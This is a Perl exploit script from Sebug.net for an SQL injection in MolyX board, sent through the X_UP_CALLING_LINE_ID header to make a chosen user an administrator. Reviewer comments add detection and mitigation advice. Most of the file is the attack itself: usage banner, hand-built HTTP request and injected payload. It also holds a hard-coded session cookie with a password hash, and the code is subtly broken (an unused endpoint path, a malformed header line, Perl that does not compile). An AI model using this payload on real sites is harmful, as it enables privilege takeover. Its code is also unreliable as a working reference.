molyx board X_UP_CALLING_LINE_ID sql injection Remote Privilege Exploit
来源:Sebug.net
# molyx board X_UP_CALLING_LINE_ID sql injection Remote Privilege Exploit
#!/usr/bin/perl -w
# NOTE(review): the #! line is not the first line of this file (three lines
# precede it), so whether the -w switch takes effect depends on how the
# script is invoked. There is no `use strict`; every variable below is a
# package global.
use IO::Socket;
## PROOF-OF-CONCEPT
## * work only with php5 or php4&&GPC=off
## Example:
## C:\>mlexp.pl 127.0.0.1 /bbs/ 1
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] OK
## [~] wait for response...
## [+] Expoilted! Maybe Id=1 is Admin Now!!
##
# What this proof-of-concept does, as a defender should read it:
#   * opens one plain TCP connection to port 80 of <server> (no TLS) and
#     writes a single hand-built HTTP/1.1 POST with an empty body;
#   * carries the SQL-injection payload in the non-standard request header
#     X_UP_CALLING_LINE_ID rather than in the query string, POST body or
#     cookies. The header value is presumably reached server-side through
#     the web server's HTTP_* environment; the line "php4&&GPC=off" above
#     suggests the author found PHP 4's magic_quotes_gpc escaped this value
#     while PHP 5 did not (inferred from the comment, not shown here);
#   * reads the response and reports success if it contains a fixed Chinese
#     success string.
# Detection: a request header named X_UP_CALLING_LINE_ID whose value contains
# a quote, SQL keywords (usergroupid=, where) and a `/*` comment opener.
# Mitigation is server-side only: treat every request-header value as
# untrusted input and use parameterised queries / proper escaping; relying on
# magic_quotes_gpc for anything outside GET/POST/COOKIE is exactly the gap
# this PoC relies on.
# Usage check: exactly three positional arguments are required; anything less
# prints the banner and exits with status 1.
if (@ARGV < 3)
{
print "\n\n";
print "|****************************************************************|\n";
print " mlexp.pl\n";
print " molyx board X_UP_CALLING_LINE_ID sql injection Remote Privilege Exploit (POC version)\n";
print " Usage: mlexp.pl <server> <folder> <user_id> \n";
print " e.g.: mlexp.pl 127.0.0.1 /bbs/ 1\n";
print " [~] <server> - server ip\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id \n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}
# Positional arguments are used as-is: $server becomes PeerAddr and the Host
# header, $folder the request-line path, $user_id is interpolated into the
# SQL fragment below.
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
print "[~] prepare to connect...\n";
# Plain TCP, hard-coded port 80. Note that in the die message $socket is
# still undefined (the assignment has not completed), so the message only
# carries $!.
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";
# Fixed cookie string sent verbatim with every request; the session id,
# user id and password-hash values appear to have been captured from the
# author's own session (not derived from the arguments).
$cookie='redbbssessionid=5604730f9608848e; cnzz02=11; rtime=0; ltime=1168828899792; cnzz_eid=75851673-; redbbsuserid=52863; redbbspassword=5d0a98dc161ba9e55208f34e2b2ef473; redbbslanguage=zh-cn ';
# Spoofed browser User-Agent.
$useragent='Opera/9.01 (Windows NT 5.1; U; zh-cn)';
# The injected fragment: closes a quoted literal, appends
# "usergroupid=4 where id=<user_id>" and comments out whatever the
# application's query appends after it with "/*". This string is the
# signature to look for in access/WAF logs.
$evildata="0',usergroupid=4 where id=$user_id/*";
# Endpoint the author associates with the vulnerable query.
$script='/wap/associate.php?do=1';
$path =$folder.$script;
# $count is incremented here but never read again on this page.
$count=$count+1;
# Hand-built request. The request line posts to $folder (the forum root);
# headers follow, then the blank line that ends the header block. No body
# and no Content-Length are sent.
$message = "POST ".$folder." HTTP/1.1\r\n";
$message .= "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n";
$message .= "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\n";
$message .= "Referer: http://".$server.$folder."/r/n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Connection: Keep-Alive\r\n";
# The payload header. Everything else above is ordinary browser-looking
# noise; this one line is what the server-side code must not trust.
$message .= "X_UP_CALLING_LINE_ID: ".$evildata."\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
print $socket "$message";
print "[+] OK\n";
print "[~] wait for response...\n";
# Reads the response line by line and checks each line for the Chinese
# string 操作成功完成 ("operation completed successfully").
# NOTE(review): `if (...) statement else statement` without braces is not
# valid Perl; as written this loop does not compile.
while ($answer = <$socket>)
{
if ($answer =~ /操作成功完成/)
print "[+] Expoilted! Maybe Id=$user_id is Admin Now!!\n"
else print "[-] exploit failed\n";
}